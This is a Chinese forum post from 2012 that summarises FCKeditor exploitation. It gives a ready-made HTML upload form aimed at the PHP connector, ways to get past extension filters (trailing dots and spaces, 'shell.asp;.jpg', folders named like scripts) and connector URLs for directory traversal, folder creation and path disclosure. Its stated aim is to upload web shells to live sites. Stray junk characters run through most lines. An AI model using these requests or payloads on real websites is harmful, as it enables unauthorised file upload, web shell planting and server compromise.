Fckeditor漏洞利用总结 ( H8 e/ n( P& K# H* ?
查看编辑器版本9 i( E( x0 j1 {6 i
FCKeditor/_whatsnew.html
~4 U6 w$ \2 @! x- r2 V—————————————————————————————————————————————————————————————% r6 O! j. ^6 B: E! H
3 ^. P+ S/ @6 x' R2. Version 2.2 版本0 |4 O: a( O* C( s: w8 Z. U- ^) n
Apache+linux 环境下在上传文件后面加个.突破!测试通过。; i1 s% X/ J/ Z) `7 v' G
—————————————————————————————————————————————————————————————
; S# F, \ Q& v! [# _: }1 ^3 Z
% L3 T# h6 Z, O. s& M! x3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。5 I8 D7 a% Z% V2 u: q
<form id="frmUpload" enctype="multipart/form-data"
7 M) A! r; G T) y$ [& ]6 caction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
k- ?, W" R/ ]2 [# N' Y* p3 t; E<input type="file" name="NewFile" size="50"><br>% v1 b/ U) X; w* e4 E. }6 {
<input id="btnUpload" type="submit" value="Upload">
4 S5 l$ ~: ]0 Q</form>6 h n4 U0 |5 @- I% P; }
—————————————————————————————————————————————————————————————' q. b3 p; ]7 |, G) J b2 _9 {
! ~& d5 N# L1 ]$ z( p! H6 V/ C1 `2 o
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
3 S4 O6 \( B7 ], L7 o 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。1 B! Q7 H2 B; D+ Y+ w
4.1:提交shell.php+空格绕过
$ X/ K5 y& d- D不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。3 k# S" [9 n0 v% p
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。) a7 ?' h; l3 G# w
—————————————————————————————————————————————————————————————
: H( @* I' S# I, t
6 R* \% |- y; K' L3 w5. 突破建立文件夹% {! l6 k6 S- X+ a4 Q. m+ r# q
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=12447899756843 o8 D' K9 O V) \
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
3 X( a! j1 n9 I7 k' b) q8 S—————————————————————————————————————————————————————————————/ s g* T9 Z' [0 Y. X
" I- M' v' q4 b `3 d6. FCKeditor 中test 文件的上传地址
' n, b- U2 X# v zFCKeditor/editor/filemanager/browser/default/connectors/test.html
: \6 R$ }) _0 X6 }( d- K: {9 @FCKeditor/editor/filemanager/upload/test.html
) y: c4 h0 \* ?, v9 PFCKeditor/editor/filemanager/connectors/test.html: N* p* p3 V' N3 d! X
FCKeditor/editor/filemanager/connectors/uploadtest.html
/ z- w5 n, U+ g) ^( K& M3 }' O—————————————————————————————————————————————————————————————8 L& U: Z+ c& U& J# g
; T+ \2 s4 }- o4 J' a+ a% ?
7.常用上传地址& _" V. S# _: f5 W4 `
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/1 q9 W6 q6 F4 {# n5 J9 n7 j
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
: Z; V6 R: t# ^/ D" \FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
$ i( r* D5 u! b3 Y! f3 f \$ |* j( r) [JSP 版:4 O/ C+ j# C7 C5 t
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp% \: P4 n/ q# Z: K5 U+ M0 L* ?* X
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
% y& ]. W, Y5 Y件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
* g6 a6 ?, p$ F' ]( ~& ^; |—————————————————————————————————————————————————————————————
f6 m6 I3 ]* v: P+ C+ H0 h& ~) E% u- y2 l+ F! E; O
8.其他上传地址
" D6 S. k7 S( yFCKeditor/_samples/default.html" J3 |& Q @% i2 |. t
FCKeditor/_samples/asp/sample01.asp
3 V8 w: F: U3 a V" eFCKeditor/_samples/asp/sample02.asp( q) T: `. n: @$ r. {
FCKeditor/_samples/asp/sample03.asp
3 c: b% ~6 ^" }FCKeditor/_samples/asp/sample04.asp
w5 f. t5 U5 b7 |; W" g9 F一般很多站点都已删除_samples 目录,可以试试。# V9 s+ C, g3 y5 Q) @8 v, m' Q
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。% T2 ~5 B0 Z) w& F6 A
—————————————————————————————————————————————————————————————) N. b$ i! f8 T! b
% }8 P! N$ I9 ~ q) t8 s2 B6 _9.列目录漏洞也可助找上传地址4 |* O6 w; z9 h' E6 A
Version 2.4.1 测试通过
, L6 m8 d- N7 B/ }; A% r修改CurrentFolder 参数使用 ../../来进入不同的目录1 ^5 d1 z; v7 d6 P4 Z
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp$ f% w7 k; b6 l, `/ C7 M
根据返回的XML 信息可以查看网站所有的目录。8 {; _8 o7 {2 y/ O
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F! H# A2 g/ ~1 Z" `) \/ j; ]* F( |
也可以直接浏览盘符:
3 i5 d. J) t4 ]( E+ {JSP 版本:$ n, N" K9 j% M/ K9 M1 B
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
, O7 r% H# N' z( { ]! t" B' g; A—————————————————————————————————————————————————————————————5 o; d: ^! [+ Y/ {/ c) m/ \) y
+ r/ G, l- r( f: R& R10.爆路径漏洞
6 ^6 @! v- k9 h. R/ a$ ^FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp* C8 O* i/ z# C( t: o
—————————————————————————————————————————————————————————————% Q7 t7 M; y( R, T" h9 X
0 F$ Z+ b6 b8 z1 \8 N; ]; q) e11. FCKeditor 被动限制策略所导致的过滤不严问题
( |9 G: V8 e- X5 q9 q7 K+ w 影响版本: FCKeditor x.x <= FCKeditor v2.4.3
% v" r9 n% s- [5 l脆弱描述:
8 z+ w+ K9 ?' X+ b3 ~& ^! qFCKeditor v2.4.3 中File 类别默认拒绝上传类型:8 f' @0 t4 f5 q# ], y, q4 ^
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm; M( j; T$ I) e" W3 u- }9 P
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!* o5 Z/ t; e4 R7 h' y# M; |
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
( I5 q& C7 ?4 Y' @9 C& H 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
4 M( B3 }) N6 S! a( O- ^8 q/ J$ A—————————————————————————————————————————————————————————————1 J# f9 g) Q- b. \" t* ]3 J
6 Y( m+ Q! P3 h12.最古老的漏洞,Type文件没有限制!3 {1 j- ?2 k$ F$ S: b8 s+ Q
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! : ^& V) }3 `* x' ~: ]
—————————————————————————————————————————————————————————————
- B' `) {& x5 b
% m4 O# ~; k. u# ]: j===============================================================================================================================================
' ]) n! M7 w9 _& C; m2 E/ K3 \7 D/ A. Z1 |& c' x x
FCK编辑器jsp版本漏洞:
% z& V3 |8 c- I) @, J' v0 A5 X7 M# \& g, \4 I7 L. t# y0 @7 a# I
1 m3 Y- q9 ?# E! Jhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
% U& H7 m7 T2 \: I; k2 m8 A3 @* u& ?) k) |/ ]2 e1 A5 P' H& _; X. C
上传马所在目录
) Q" x5 f5 h, J3 Z' s iFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
+ j! ~ J. m) M. M9 v上传shell的地址:
/ Z3 V1 k* Z( Y5 I, q, D. g- D( c3 G Xhttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
. N, O" G, y( o) x" W! `跟版本有关系.并不是百分百成功. 测试成功几个站.
6 |7 K9 M5 C$ D/ C, x2 M) h! W8 `不能通杀.很遗憾.
]' X! p6 o6 I& ?, h1 [4 @) m+ dhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
: t) G) G; |( U9 U6 o9 G2 r如果以上地址不行可以试试
3 ~% Z' M- x; ~% dFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector6 z0 X" D+ }) E7 s
FCKeditor/_samples/! ~9 P7 N# F4 a2 o+ j, |. \: m
FCKeditor/_samples/default.html# i6 [: t! s5 _8 H1 b: R+ J
FCKeditor/editor/fckeditor.htm
) W6 _$ U1 O' ?# M& M! p+ B5 j% VFCKeditor/editor/fckdialog.html3 T e& J: x h5 y
# P" [3 P, [( Z! u; a7 E: i+ i# H$ U1 e8 |2 U
; }/ G8 U1 n! Q* z0 p解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
/ h3 @* R0 d( Q. E, _1 Y! J& v |
发表于 2012-9-13 17:01:39
收藏
支持
反对